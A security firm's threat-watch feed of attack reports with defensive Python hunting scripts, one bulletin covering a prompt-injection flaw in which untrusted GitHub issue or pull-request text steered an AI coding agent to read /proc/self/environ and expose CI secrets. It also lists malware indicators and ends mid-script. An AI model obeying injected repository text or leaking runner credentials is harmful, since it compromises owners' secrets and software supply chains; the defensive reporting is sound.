Threat Watch Feed
🚩 – IOCs Added
The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.
🚩 VerdantBamboo Compromises Edge Appliances and MSP Infrastructure to Maintain Long-Term Access
Volexity reported that the Chinese threat actor VerdantBamboo, also tracked as WARP PANDA and UNC5221, compromised Linux- and BSD-based appliances to maintain persistent access while avoiding traditional endpoint monitoring. Volexity's investigation began with suspicious traffic from an Egnyte Storage Sync virtual appliance, which was connecting to attacker-controlled infrastructure fronted by Cloudflare and resolving names with DNS over HTTPS via Google's public resolver. Volexity ultimately found that the appliance had been compromised with BRICKSTORM, a Golang-based RAT that VerdantBamboo uses for command execution, SOCKS proxying, and filesystem access. The investigation uncovered a much longer intrusion timeline: the Storage Sync appliance and an MSP-managed pfSense firewall had been compromised for at least 18 months. VerdantBamboo likely used the MSP compromise to obtain the credentials and infrastructure details needed to access the victim environment. After remediation, the actor returned, using stolen administrative credentials to access the victim's internet-exposed firewall, enable web SSL VPN access, pivot internally, and deploy PLENET, a previously undocumented .NET Native AOT backdoor, to a Synology NAS device. Volexity also identified AGENTPSD, a Python reverse shell deployed as a fallback access mechanism should BRICKSTORM become unavailable.
Impact: Successful compromise of firewalls, NAS devices, storage sync appliances, and other edge systems can give threat actors durable access to environments with limited endpoint visibility. VerdantBamboo used appliance-based malware and proxy capabilities to blend in with legitimate traffic, access Microsoft 365, and bypass Conditional Access policies that would otherwise block suspicious logins. The MSP compromise also created downstream risk for customer environments by exposing credentials, management paths, and trusted access relationships. Because these devices often lack EDR coverage and may restrict owner-level forensic access, intrusions can persist for months before detection.
Recommendation:
- Review firewalls, NAS devices, storage sync appliances, VPN systems, and virtualization infrastructure for unexplained administrative access, SSH enablement, modified startup scripts, cron changes, or unexpected binaries.
- Patch Egnyte Storage Sync to version 13.13 or later to address the reported privilege escalation issue. Require MFA for local and administrative accounts on VPNs, firewalls, NAS devices, and management interfaces.
- Restrict appliance administrative interfaces from direct internet exposure and limit access to dedicated management networks or approved source IPs.
- Audit MSP access paths, credentials, management accounts, and remote administration methods for signs of compromise or credential reuse.
- Monitor for suspicious VPN activity involving local accounts, newly enabled web SSL VPN configurations, or administrator logins from unusual infrastructure.
- Review Linux and BSD appliances for BRICKSTORM, PLENET, and AGENTPSD indicators, including unexpected binaries in /usr/sbin/, /usr/local/libexec/ipsec/, and Egnyte-related paths.
- Hunt for suspicious cron entries, including modified /etc/crontab, /etc/cron.d/ files, and changes to /etc/rc.d/cron.
- Monitor for appliance traffic to unusual Cloudflare-backed domains, WebSocket C2 activity, and DNS over HTTPS behavior from systems that do not normally use it.
- Review Microsoft 365 sign-in activity for access routed through internal appliance or VPN IPs that may have been used as threat actor proxy points.
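The cron and unexpected-binary checks in the recommendations above, as an added Python hunting script. This is not Volexity's or SRA's tooling: the watch directories (/usr/sbin/, /usr/local/libexec/ipsec/) and cron locations come from the bulletin, while the regex heuristics, the allowlist, and the sample tree it builds for an offline run are illustrative assumptions. Point it at "/" on a live appliance or at the mount point of a forensic image; the allowlist should be generated from a known-good appliance of the same version.

```python
"""Added example: hunt an appliance root for the cron persistence and
unexpected-binary patterns listed above. Not Volexity's or SRA's tooling;
the watch directories come from the bulletin, everything else (regexes,
allowlist, sample tree) is an illustrative assumption."""
import os
import re
import sys
import tempfile

# Drop locations the bulletin names, relative to the appliance root.
WATCH_DIRS = ("usr/sbin", "usr/local/libexec/ipsec")

# Cron tradecraft worth a second look (assumed heuristics, tune per appliance).
SUSPICIOUS = re.compile(
    r"@reboot"                                  # run-at-boot jobs
    r"|/(?:tmp|var/tmp|dev/shm|home)/"          # commands in user-writable dirs
    r"|/\.[A-Za-z0-9_]"                         # hidden file or dir in the path
    r"|\b(?:curl|wget|nohup|python[0-9.]*)\b"   # downloaders and interpreters
)


def cron_entries(root):
    """Yield (file, line) for every active line in /etc/crontab and /etc/cron.d/*."""
    files = [os.path.join(root, "etc", "crontab")]
    cron_d = os.path.join(root, "etc", "cron.d")
    if os.path.isdir(cron_d):
        files += sorted(os.path.join(cron_d, f) for f in os.listdir(cron_d))
    for path in files:
        if not os.path.isfile(path):
            continue
        with open(path, errors="replace") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    yield path[len(root):], line


def suspicious_cron(root):
    """Cron lines matching the SUSPICIOUS patterns."""
    return [(f, l) for f, l in cron_entries(root) if SUSPICIOUS.search(l)]


def unlisted_binaries(root, allowlist):
    """Regular files in WATCH_DIRS whose name is not in allowlist, a set of
    basenames taken from a known-good appliance of the same version."""
    hits = []
    for rel in WATCH_DIRS:
        full = os.path.join(root, rel)
        if not os.path.isdir(full):
            continue
        for name in sorted(os.listdir(full)):
            path = os.path.join(full, name)
            if os.path.isfile(path) and name not in allowlist:
                hits.append(path[len(root):])
    return hits


def changed_since(root, ref_mtime):
    """Cron and rc.d files modified after a trusted reference time, e.g. the
    mtime of the package database from the last legitimate update."""
    hits = []
    for rel in ("etc/crontab", "etc/cron.d", "etc/rc.d"):
        top = os.path.join(root, rel)
        if os.path.isfile(top):
            paths = [top]
        else:
            paths = [os.path.join(d, n) for d, _, ns in os.walk(top) for n in ns]
        hits += [p[len(root):] for p in paths if os.stat(p).st_mtime > ref_mtime]
    return sorted(hits)


def build_sample_root():
    """Constructed sample tree for offline demonstration (not real evidence)."""
    root = tempfile.mkdtemp()
    for rel in ("etc/cron.d", "etc/rc.d") + WATCH_DIRS:
        os.makedirs(os.path.join(root, rel))

    def write(rel, text):
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(text)

    write("etc/crontab",
          "# system crontab\n0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n")
    write("etc/cron.d/vpn",
          "@reboot root /usr/local/libexec/ipsec/.vpnd >/dev/null 2>&1\n"
          "*/5 * * * * root /var/tmp/.s/update.sh\n")
    for rel in ("usr/sbin/logrotate", "usr/local/libexec/ipsec/charon",
                "usr/local/libexec/ipsec/.vpnd"):
        write(rel, "")
    return root


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_root()
    for f, line in suspicious_cron(root):
        print(f"[cron] {f}: {line}")
    for path in unlisted_binaries(root, {"logrotate", "charon"}):
        print(f"[binary] {path}")
```

The allowlist approach matters more than the regexes: a hidden file such as `.vpnd` under the strongSwan libexec directory looks legitimate only until compared against the file list of a clean appliance, and `changed_since` lets you anchor the comparison to the last trusted update rather than to "recent".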
Claude Code GitHub Action Vulnerability Exposed CI/CD Secrets Through AI Agent Prompt Injection
Microsoft Defender Security Research found that Anthropic’s Claude Code GitHub Action could expose CI/CD workflow secrets when an AI agent processed untrusted GitHub content, such as issue bodies, pull request descriptions, or comments. The issue stemmed from a trust-boundary gap where Claude Code’s Bash tool used environment scrubbing and Bubblewrap sandboxing, but the Read tool was not subject to the same isolation. As a result, an attacker-controlled prompt could steer the agent to read /proc/self/environ, exposing the workflow’s ANTHROPIC_API_KEY and potentially other secrets available to the runner. Anthropic mitigated the issue in Claude Code version 2.1.128 by blocking access to sensitive /proc files. Microsoft emphasized that AI-powered CI/CD workflows introduce a different security model because natural language from untrusted sources can influence agent behavior. The research also showed broader prompt injection risk in AI-assisted GitHub workflows, including scenarios where malicious issue content could direct an agent to modify repository files, create pull requests, or leak credentials through logs, issue comments, external fetches, or other tool-enabled channels.
Impact: Successful exploitation could allow an unauthenticated or low-privileged GitHub user to influence an AI agent running inside a CI/CD workflow and expose sensitive secrets from the runner environment. Exposed API keys, GitHub tokens, cloud credentials, package publishing tokens, or internal service credentials could enable unauthorized API usage, repository access, package tampering, cloud compromise, or follow-on software supply chain activity. The risk is highest where AI agents process untrusted GitHub content while also having access to secrets, file-read tools, shell execution, repository write permissions, or external communication channels.
Recommendation:
- Upgrade Claude Code to version 2.1.128 or later. Review all GitHub Actions workflows that use AI agents to process issues, pull requests, comments, commit messages, or repository content.
- Avoid combining untrusted input processing, access to secrets, and external communication or state-changing tools in the same workflow.
- Scope API keys, GitHub tokens, cloud credentials, and package publishing tokens to the minimum permissions required.
- Use separate credentials per workflow and per environment to limit blast radius. Monitor AI workflow credentials for unusual usage, new source IPs, traffic spikes, or access to endpoints not normally used by the workflow.
- Restrict AI agent tools such as Bash, WebFetch, repository write operations, GitHub MCP tools, and broad file-read access unless explicitly required.
- Harden system prompts by clearly defining untrusted surfaces, permitted tasks, and refusal behavior for requests outside the workflow’s purpose.
- Disable or restrict full output logging where secrets could be leaked into GitHub Actions logs.
- Review recent AI workflow runs for suspicious attempts to read environment files, access /proc, echo modified secrets, post unusual comments, or contact external domains.
- Treat prompt injection against AI workflows as part of the CI/CD threat model, not only as an application-layer concern.
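To make the trust-boundary point concrete, here is an added Python example of a read-policy wrapper for an agent's file-read tool, the control the research found missing (shell calls were env-scrubbed and sandboxed, file reads were not). It is not Anthropic's fix and not Microsoft's proof of concept. The workspace path, the deny patterns, and the sample environ contents are assumptions; the `.git/config` entry reflects that actions/checkout persists the job token there by default.

```python
"""Added example: a read-policy wrapper for an agent's file-read tool,
closing the gap described above (shell env-scrubbed and sandboxed, Read not).
Not Anthropic's fix or Microsoft's PoC. The workspace path, deny patterns,
and sample environ are illustrative assumptions."""
import os
import re
import tempfile

WORKSPACE = "/home/runner/work/repo/repo"   # assumed checkout path

# Files that hand an agent runner secrets or process state. /proc/<pid>/environ
# is the path in the research; the rest are common equivalents on a runner.
DENY_PATTERNS = [
    re.compile(r"^/proc/(?:self|thread-self|\d+)(?:/|$)"),
    re.compile(r"^/dev/(?:mem|kmem|port)$"),
    re.compile(r"(?:^|/)\.env(?:\.[^/]+)?$"),           # .env, .env.local
    re.compile(r"(?:^|/)\.git/config$"),                # checkout token lives here
    re.compile(r"(?:^|/)\.(?:ssh|aws|docker|kube)(?:/|$)"),
    re.compile(r"(?:^|/)\.(?:npmrc|netrc|pypirc)$"),
]
SECRET_KV = re.compile(r"\b([A-Z][A-Z0-9_]*(?:KEY|TOKEN|SECRET|PASSWORD|PWD))=\S+")


def normalize(path, cwd):
    """Absolute, symlink-resolved path so '../' and links cannot dodge checks.
    realpath does not require the path to exist, which keeps this portable."""
    if not os.path.isabs(path):
        path = os.path.join(cwd, path)
    return os.path.realpath(path)


def check_read(path, workspace=WORKSPACE):
    """Return (allowed, detail). Reads must resolve inside the workspace and
    must not hit a deny pattern; a symlink planted by a PR that points at
    /proc/self/environ resolves outside the workspace and is refused."""
    workspace = os.path.realpath(workspace)
    resolved = normalize(path, workspace)
    if not resolved.startswith(workspace.rstrip("/") + "/"):
        return False, f"outside workspace: {resolved}"
    for rx in DENY_PATTERNS:
        if rx.search(resolved):
            return False, f"sensitive file: {resolved}"
    return True, resolved


def redact(text, secret_values=()):
    """Mask known secret values and KEY=value dumps in tool output before it
    reaches the model (second net for anything that slips past check_read)."""
    text = text.replace("\x00", "\n")       # environ files are NUL-separated
    for value in sorted(secret_values, key=len, reverse=True):
        if value:
            text = text.replace(value, "[REDACTED]")
    return SECRET_KV.sub(r"\1=[REDACTED]", text)


def guarded_read(path, secret_values=(), workspace=WORKSPACE):
    """What the Read tool handler would call. Returns the redacted content
    or a refusal string the agent sees instead of the file."""
    allowed, detail = check_read(path, workspace)
    if not allowed:
        return f"read refused ({detail})"
    with open(detail, errors="replace") as fh:
        return redact(fh.read(), secret_values)


def planted_symlink_demo():
    """Simulate a PR adding workspace/notes.txt -> /proc/self/environ and
    return whether the guard allows reading it (it must not)."""
    ws = tempfile.mkdtemp()
    os.symlink("/proc/self/environ", os.path.join(ws, "notes.txt"))
    return check_read("notes.txt", ws)[0]


# Constructed stand-in for /proc/self/environ on a runner; values are fake.
SAMPLE_ENVIRON = ("HOME=/home/runner\x00ANTHROPIC_API_KEY=sk-example-0000\x00"
                  "GITHUB_TOKEN=ghs_example\x00PATH=/usr/bin\x00")
```

Two design points: the path check resolves symlinks and `..` before comparing against the workspace, because untrusted pull requests can add a symlink that looks like a repository file; and the output redaction runs on the known secret values (the workflow has them, so it can mask them) as well as on `KEY=value` shapes, so a partial bypass still does not return a usable token to the model.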
Chinese Intelligence Operatives Use Fake Online Recruitment Campaigns to Target Government and Military Personnel
The Five Eyes intelligence alliance has warned that Chinese military intelligence officers are conducting online recruitment campaigns designed to collect sensitive government, military, political, and economic information. The operators reportedly impersonate legitimate think tanks, consulting firms, and human resources organizations and advertise positions on professional networking and recruitment platforms. They target individuals with security clearances, government experience, military backgrounds, or indirect access to sensitive information. After identifying suitable candidates, the operators conduct virtual interviews, assess access to privileged information, and request written reports on geopolitical, defense, and trade-related topics. They then encourage candidates to provide increasingly sensitive information in exchange for financial compensation and often move communications to encrypted messaging platforms. The campaign leverages social engineering techniques to establish long-term relationships and collect information that intelligence services can aggregate and analyze for strategic advantage.
Impact: This threat presents significant risks to government agencies, defense organizations, contractors, research institutions, and private-sector organizations that support critical national infrastructure. Adversaries can exploit trusted professional networking platforms to identify and engage personnel with access to sensitive information without compromising technical systems. Even when individuals share information they believe is unclassified, threat actors can combine multiple data sources to develop detailed intelligence on personnel, operations, capabilities, supply chains, and strategic priorities. Organizations may face the loss of sensitive information, increased insider threat exposure, regulatory consequences, reputational damage, and risks to operational security. Individuals who disclose protected or classified information may face disciplinary action, loss of security clearances, termination of employment, or criminal prosecution.
Recommendation:
- Train employees, contractors, and former personnel to recognize recruitment-based social engineering tactics, including unsolicited job offers related to defense, government policy, intelligence, and national security topics.
- Require personnel with access to sensitive information to report suspicious recruitment attempts, consulting opportunities, or requests for specialized analysis from unknown organizations.
- Verify the legitimacy of recruiters, consulting firms, and think tanks through independent research before engaging in interviews or sharing professional information.
- Establish insider risk monitoring programs that identify unusual external engagements, unauthorized information sharing, or attempts to monetize privileged knowledge.
🚩 FIFA World Cup 2026 Cyberthreat Activity Expands Across Domains, Ticket Scams, Malware, and Credential Exposure
FortiGuard Labs reported a significant increase in FIFA World Cup 2026-themed cybercriminal activity ahead of the tournament, including more than 13,000 newly registered FIFA-related domains between January and May 2026, with approximately 8.8% classified as malicious or suspicious. The report also identified more than 1,700 suspected FIFA impersonation accounts across social media platforms, with activity concentrated on Facebook and Instagram, as well as FIFA-themed scam activity involving fake ticketing websites, resale fraud, fraudulent merchandise stores, fake streaming pages, cryptocurrency scams, and job recruitment phishing.
The report highlights several active threat vectors, including fake ticket checkout pages harvesting billing and payment information, resale scams promoted through Telegram, fraudulent recruitment pages impersonating FIFA and sponsor hiring processes, and malicious or suspicious FIFA-themed applications distributed through third-party sites. FortiGuard Labs also observed FIFA-related credentials in stealer log telemetry, including activity tied to Vidar, LummaC2, and RedLine, along with FIFA-associated employee and organizational accounts appearing in historical breach datasets and underground forums. The report’s infrastructure analysis further identified FIFA-themed domain clusters and hosting overlaps associated with phishing, malware, RATs, Cobalt Strike infrastructure, domain squatting, and fake shopping or ticketing activity.
Impact: FIFA World Cup 2026-related scams may expose fans, travelers, sponsors, employees, and tournament stakeholders to credential theft, payment fraud, malware infection, account takeover, identity theft, and brand impersonation. Fake ticketing, streaming, merchandise, and recruitment campaigns can harvest personal information, payment details, Gmail credentials, and login data, while malicious applications and trojanized APKs may enable persistence, remote communication, credential compromise, and destructive encryption-related activity. The continued appearance of FIFA-related credentials in stealer logs and breach datasets increases the risk of credential stuffing, targeted phishing, and impersonation against FIFA-associated organizations and users.
Recommendation:
- Block or investigate suspicious domains and infrastructure highlighted in FIFA-themed campaigns.
- Educate users to purchase tickets, merchandise, travel packages, and streaming access only through official FIFA, sponsor, broadcaster, or verified reseller channels.
- Track suspicious payment flows tied to ticket resale scams, including cryptocurrency, wire transfer, Apple Pay, Zelle, CashApp, and other peer-to-peer payment methods.
- Maintain monitoring for hacktivist narratives using FIFA World Cup 2026 themes to amplify data leaks, anti-government messaging, or reputational pressure against host-nation institutions.
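The domain-registration figures above become actionable only with a triage step that separates FIFA-themed registrations from noise. The following added Python example scores a newly-registered-domain feed for brand abuse of the kind described; it is not FortiGuard's tooling. The keyword weights, risky-TLD list, the one-entry official-domain allowlist, the confusable-character map, and the sample feed are all illustrative assumptions, and the eTLD+1 logic is deliberately crude (swap in a public-suffix list for real use).

```python
"""Added example: triage newly registered domains for FIFA World Cup 2026
brand abuse of the kind described above. Not FortiGuard's tooling. Keyword
weights, TLD list, official-domain allowlist, and the sample feed are
illustrative assumptions; use a vetted official-domain list in practice."""
import unicodedata

BRAND_TERMS = ("fifa", "worldcup", "world-cup", "wc2026", "mundial")
LURE_TERMS = {"ticket": 2, "tix": 2, "stream": 2, "job": 2, "career": 2,
              "hiring": 2, "crypto": 2, "token": 2, "shop": 1, "store": 1,
              "merch": 1, "2026": 1}
RISKY_TLDS = {"top", "xyz", "shop", "live", "click", "icu", "cyou", "cfd"}
OFFICIAL = {"fifa.com"}   # assumption: replace with the verified list

# Digit and Cyrillic look-alikes commonly used for brand squatting (partial map).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t"})
CONFUSABLES = str.maketrans({"\u0430": "a", "\u0435": "e", "\u0456": "i",
                             "\u043e": "o", "\u0440": "p", "\u0441": "c"})


def normalize(domain):
    """Lowercase, decode punycode labels, fold accents and confusables to ASCII."""
    labels = []
    for label in domain.strip().lower().rstrip(".").split("."):
        if label.startswith("xn--"):
            try:
                label = label.encode("ascii").decode("idna")
            except UnicodeError:
                pass
        label = label.translate(CONFUSABLES)
        label = unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode()
        labels.append(label)
    return ".".join(labels)


def registrable(domain):
    """Crude eTLD+1 (last two labels); swap in a public-suffix list for real use."""
    return ".".join(domain.split(".")[-2:])


def find_brand(flat_raw, flat_leet):
    """Return (term, via_lookalike) for the first brand term present."""
    for term in BRAND_TERMS:
        t = term.replace("-", "")
        if t in flat_raw:
            return term, False
        if t in flat_leet:
            return term, True
    return None, False


def score(domain):
    """Return (score, reasons); 0 means not FIFA-themed or an official domain."""
    norm = normalize(domain)
    if registrable(norm) in OFFICIAL:
        return 0, ["official"]
    host, _, tld = norm.rpartition(".")
    flat_raw = host.replace("-", "").replace(".", "")   # labels without the TLD
    flat = flat_raw.translate(LEET)
    brand, via_leet = find_brand(flat_raw, flat)
    if brand is None:
        return 0, []
    points, reasons = 3, [f"brand:{brand}"]
    if via_leet or norm != domain.strip().lower().rstrip("."):
        points += 2
        reasons.append("lookalike spelling")
    for term, weight in LURE_TERMS.items():
        if term in flat_raw or term in flat:
            points += weight
            reasons.append(f"lure:{term}")
    if tld in RISKY_TLDS:
        points += 1
        reasons.append(f"tld:{tld}")
    return points, reasons


def triage(domains, threshold=3):
    """Domains at or above threshold as (domain, score, reasons), highest first."""
    scored = [(d, *score(d)) for d in domains]
    return sorted([s for s in scored if s[1] >= threshold], key=lambda s: -s[1])


# Constructed sample feed (not from the report).
SAMPLE_FEED = ["fifa.com", "tickets.fifa.com", "fifa-tickets2026.shop",
               "f1fa-worldcup-stream.live", "f\u00edfa-shop.xyz",
               "worldcupfan.org", "example.org"]
```

The score is meant to order an analyst's queue, not to block on its own: a brand term alone is a weak signal (fan sites exist), but brand plus a ticketing or streaming lure plus a digit substitution or accented look-alike is the combination the report describes.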
🚩 TA4922 Expands Global Campaigns Using Localized Lures, New Loaders, RMM Tools, and RAT Payloads
Proofpoint reported that TA4922, a Chinese-speaking financially motivated threat actor, has expanded beyond its historical East Asia targeting to include organizations in Europe and Africa. The actor uses localized lures themed around human resources, payroll, tax, invoicing, and compliance to deliver malware, credential phishing, and fraud-oriented campaigns. Recent activity in March and April 2026 showed a significant increase in operational tempo and tooling diversity, including Atlas RAT, RomulusLoader, SilentRunLoader, ValleyRAT/Winos4.0, and legitimate remote management tools such as AnyDesk and SyncFuture.
TA4922 campaigns commonly use file-sharing services such as GoFile, LimeWire, and MediaFire to host ZIP, RAR, or IMG payloads that contain legitimate executables paired with malicious DLLs for DLL sideloading. Atlas RAT campaigns used HR and invoicing lures against Japan, the United Kingdom, and Germany, while RomulusLoader campaigns delivered additional payloads, including RMM tools, through tax and payroll themes. SilentRunLoader campaigns impersonated tax and benefits authorities and used Python-based malware to download additional payloads and exfiltrate Chrome browser data, including stored credentials, cookies, and browsing information. Based on code comments, strings, and unchanged placeholder values, Proofpoint also assessed with high confidence that TA4922 is using LLMs to rapidly develop Python-based loader and stealer variants.
Impact: Successful compromise can provide TA4922 with remote access, credential theft, browser data theft, surveillance capability, and persistent access that could support fraud, access resale, data theft, or follow-on exploitation. Atlas RAT can collect system information, upload files, load plugins, capture audio and webcam data, keylog, capture clipboard content, and take screenshots. RomulusLoader can inject into processes, communicate with C2 infrastructure, and retrieve follow-on payloads such as RMM tooling. SilentRunLoader can collect Chrome data and exfiltrate it to attacker-controlled infrastructure. The use of localized lures, legitimate file-hosting services, DLL sideloading, RMM tools, and multiple malware families may make detection more difficult across geographically diverse environments.
Recommendation:
- Block or investigate TA4922 C2 infrastructure, including 206.238.115[.]58, 154.211.86[.]110, 43.156.77[.]97, 103.214.172[.]33, 18.139.83[.]110, and ws.ztts88[.]cyou.
- Hunt for ZIP, RAR, or IMG archives that contain legitimate executables paired with suspicious DLLs such as libcef.dll, vulkan-1.dll, or other DLLs used for sideloading.
- Monitor for execution from temporary user paths such as %TEMP%, %APPDATA%, Downloads, and mounted IMG files.
- Review systems for unauthorized AnyDesk or SyncFuture installation, especially where installed shortly after execution of downloaded archives or suspicious DLL sideloading chains.
- Alert on suspicious outbound traffic to non-standard ports such as TCP 886, 1234, 7880, or 7881 from processes not expected to use those ports.
- Monitor for process injection into svchost.exe, dllhost.exe, or other long-lived Windows processes following execution of downloaded business-themed archives.
- Hunt for Chrome credential and cookie theft behaviors, including unusual access to Chrome user data directories followed by HTTP POST traffic to unknown infrastructure.
- Enforce application allowlisting for trusted directories and restrict execution from user-writable paths.
- Apply least-privilege controls to reduce local administrator access and limit malware ability to persist, inject, or deploy RMM tools.
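The detection bullets above describe a chain (archive in a user-writable path, legitimate EXE sideloading libcef.dll or vulkan-1.dll, beacon to C2 on an odd port, injection into svchost.exe, RMM install minutes later) rather than isolated events. This added Python example correlates them over Sysmon-style telemetry; it is not Proofpoint's tooling. The C2 addresses, DLL names, and ports are the bulletin's; the event schema, the user-writable-path heuristic (including treating any non-C: drive as a possible mounted IMG), the 30-minute RMM window, and the sample events are constructed assumptions.

```python
"""Added example: correlate the TA4922 behaviors listed above over endpoint
telemetry (Sysmon-style process, image-load, network and remote-thread
events). Not Proofpoint's tooling. The IOCs, DLL names and ports are from the
bulletin; the event schema, path heuristics and sample events are constructed."""
import re
from datetime import datetime, timedelta

C2_IOCS = {s.replace("[.]", ".") for s in (
    "206.238.115[.]58", "154.211.86[.]110", "43.156.77[.]97",
    "103.214.172[.]33", "18.139.83[.]110", "ws.ztts88[.]cyou")}
SIDELOAD_DLLS = {"libcef.dll", "vulkan-1.dll"}
C2_PORTS = {886, 1234, 7880, 7881}
RMM_TOOLS = {"anydesk.exe"}          # SyncFuture binary name not given; add when known
INJECT_TARGETS = {"svchost.exe", "dllhost.exe"}
# %TEMP%, %APPDATA%, Downloads, or a non-system drive letter (mounted IMG).
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|downloads)\\|^[d-z]:\\", re.I)
RMM_WINDOW = timedelta(minutes=30)   # assumed: RMM this soon after a sideload is the chain


def base(path):
    return path.rsplit("\\", 1)[-1].lower()


def ts(event):
    return datetime.fromisoformat(event["ts"])


def detect(events):
    """Return [(rule, host, detail)] in time order."""
    alerts, sideloads = [], {}          # sideloads: host -> first sideload time
    for e in sorted(events, key=ts):
        host, kind = e["host"], e["type"]
        if (kind == "image_load" and base(e["image"]) in SIDELOAD_DLLS
                and USER_WRITABLE.search(e["image"])
                and USER_WRITABLE.search(e["process"])):
            sideloads.setdefault(host, ts(e))
            alerts.append(("dll_sideload", host,
                           f"{base(e['process'])} loaded {e['image']}"))
        elif kind == "network":
            dest = e.get("dest_host") or e["dest_ip"]
            if dest in C2_IOCS:
                alerts.append(("c2_ioc", host,
                               f"{base(e['process'])} -> {dest}:{e['dest_port']}"))
            elif e["dest_port"] in C2_PORTS and USER_WRITABLE.search(e["process"]):
                alerts.append(("odd_port", host,
                               f"{base(e['process'])} -> {dest}:{e['dest_port']}"))
        elif (kind == "remote_thread" and base(e["target"]) in INJECT_TARGETS
                and USER_WRITABLE.search(e["source"])):
            alerts.append(("injection", host,
                           f"{base(e['source'])} -> {base(e['target'])}"))
        elif kind == "process" and base(e["image"]) in RMM_TOOLS:
            first = sideloads.get(host)
            if first and ts(e) - first <= RMM_WINDOW:
                alerts.append(("rmm_after_sideload", host,
                               f"{base(e['image'])} {ts(e) - first} after sideload"))
    return alerts


P = r"C:\Users\anna\Downloads\Payroll_2026\PayrollViewer.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"ts": "2026-04-02T09:14:03", "host": "WS-FIN-07", "type": "process",
     "image": P, "parent": r"C:\Windows\explorer.exe"},
    {"ts": "2026-04-02T09:14:04", "host": "WS-FIN-07", "type": "image_load",
     "process": P, "image": r"C:\Users\anna\Downloads\Payroll_2026\libcef.dll"},
    {"ts": "2026-04-02T09:14:09", "host": "WS-FIN-07", "type": "network",
     "process": P, "dest_ip": "206.238.115.58", "dest_port": 7880},
    {"ts": "2026-04-02T09:14:40", "host": "WS-FIN-07", "type": "network",
     "process": P, "dest_ip": "198.51.100.20", "dest_port": 1234},
    {"ts": "2026-04-02T09:15:30", "host": "WS-FIN-07", "type": "remote_thread",
     "source": P, "target": r"C:\Windows\System32\svchost.exe"},
    {"ts": "2026-04-02T09:19:12", "host": "WS-FIN-07", "type": "process",
     "image": r"C:\Users\anna\AppData\Roaming\AnyDesk\AnyDesk.exe", "parent": P},
    # benign noise: a CEF-based app in Program Files and normal browser traffic
    {"ts": "2026-04-02T09:20:00", "host": "WS-FIN-07", "type": "image_load",
     "process": r"C:\Program Files\VendorApp\VendorApp.exe",
     "image": r"C:\Program Files\VendorApp\libcef.dll"},
    {"ts": "2026-04-02T09:20:05", "host": "WS-FIN-07", "type": "network",
     "process": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_ip": "203.0.113.9", "dest_port": 443},
]
```

The benign events show why the path condition matters: libcef.dll is a legitimate Chromium Embedded Framework library that many installed applications load, so the DLL name alone would page on every CEF app in Program Files. The signal is the same DLL loaded from Downloads, %TEMP%, %APPDATA%, or a freshly mounted image by an executable that also lives there.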
Fake Open-Source Project Sites Use Click Hijacking and TDS Redirects to Deliver Malware
Check Point Research reported a large-scale malware distribution ecosystem that impersonates open-source and freeware projects to capture search traffic and route users through a gated Traffic Distribution System. The fake sites mimic trusted software portals, including security and reverse-engineering tools such as Ghidra, dnSpy, and ILSpy, and often preserve legitimate-looking links to real upstream GitHub repositories. However, when users click a download button, CloudFront-hosted JavaScript intercepts the interaction and redirects the browser into a TDS chain rather than the visible download destination.
The TDS uses first-visit logic, click confirmation, anti-bot and anti-analysis checks, VPN and datacenter filtering, browser fingerprinting, geo-based routing, and frequency capping to determine which users are redirected to downstream payload infrastructure. Check Point observed multiple malware families delivered through this ecosystem, including RemusStealer, AnimateClipper, and SessionGate. SessionGate stood out as a heavily gated multi-stage framework with per-session payload generation and one-time-style key release, while RemusStealer targeted browsers, extensions, password managers, 2FA tools, and crypto wallets. AnimateClipper used a ClickFix-style lure and on-chain C2 resolution to deploy a crypto clipper that replaces copied wallet addresses with attacker-controlled addresses.
Impact: Users searching for trusted freeware or open-source tools may unknowingly download malware from professional-looking impersonation sites, even when the visible link appears to point to a legitimate project. This creates elevated risk for security researchers, developers, IT administrators, and technical users who may search for tools such as Ghidra, dnSpy, ILSpy, grpcurl, MQTT Explorer, or disk utilities. Successful infection may result in credential theft, browser data theft, password manager and crypto wallet targeting, clipboard hijacking, unwanted software installation, or follow-on malware delivery through gated payload chains that are difficult to reproduce during analysis.
Recommendation:
- Require users to download security tools, developer utilities, and freeware directly from verified vendor domains, official repositories, or approved internal software portals.
- Block or investigate access to lookalike domains such as ghidralite[.]com, dnspy[.]org, ilspy[.]org, grpcurl[.]com, mqttexplorer[.]com, mfcmapi[.]com, crystaldiskmark[.]org, and similar project impersonation sites.
- Monitor for CloudFront-hosted JavaScript staging URLs tied to suspicious download portals, especially scripts that intercept click or mousedown events and redirect users away from visible href destinations.
- Hunt for SessionGate indicators, including traffic to appfreshstart[.]com, appgetonline[.]com, webinnosetup[.]com, appmakingcenter[.]com, yourfastcrc[.]com, mobileversioncrc[.]com, webcrcprove[.]com, and integritycrc[.]com.
- Monitor for suspicious 7-Zip SFX installers, oversized binaries with padding, encrypted embedded modules, manual PE mapping, and payloads that fall back to benign installer behavior when analysis gates fail.
- Review endpoint activity for ClickFix-style execution involving mshta.exe retrieving remote content, especially URLs such as https://185.0xA1.0xFB[.]58/navy.7z or suspicious .rtf resources that are actually script or archive content.
- Detect crypto clipper behavior, including processes that monitor clipboard contents and replace wallet-like strings across multiple blockchain address formats.
- Hunt for RemusStealer C2 endpoints such as buccstanor[.]pics, baxe[.]pics, intem[.]lat, ropea[.]top, forestoaker[.]com, and related IP-based URLs.
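The click-hijack technique above is detectable from the page itself: the visible download link points at the real upstream repository while a script hooks the click and navigates somewhere else. This added Python example checks a fetched page for that mismatch and for redirect targets that match the SessionGate hosts listed; it is not Check Point's tooling. The SessionGate host list is the bulletin's. The sample HTML, the CloudFront script URL, its body, and the trusted-upstream list are constructed assumptions, and external script bodies are something you download separately and pass in, since the check can only judge code it can see.

```python
"""Added example: a page-side check for the click-hijack pattern described
above (visible download link to the real upstream, but a script intercepts
the click and navigates elsewhere). Not Check Point's tooling. The SessionGate
hosts are from the bulletin; the HTML, script URL and script body are
constructed, and external script bodies must be fetched and passed in."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

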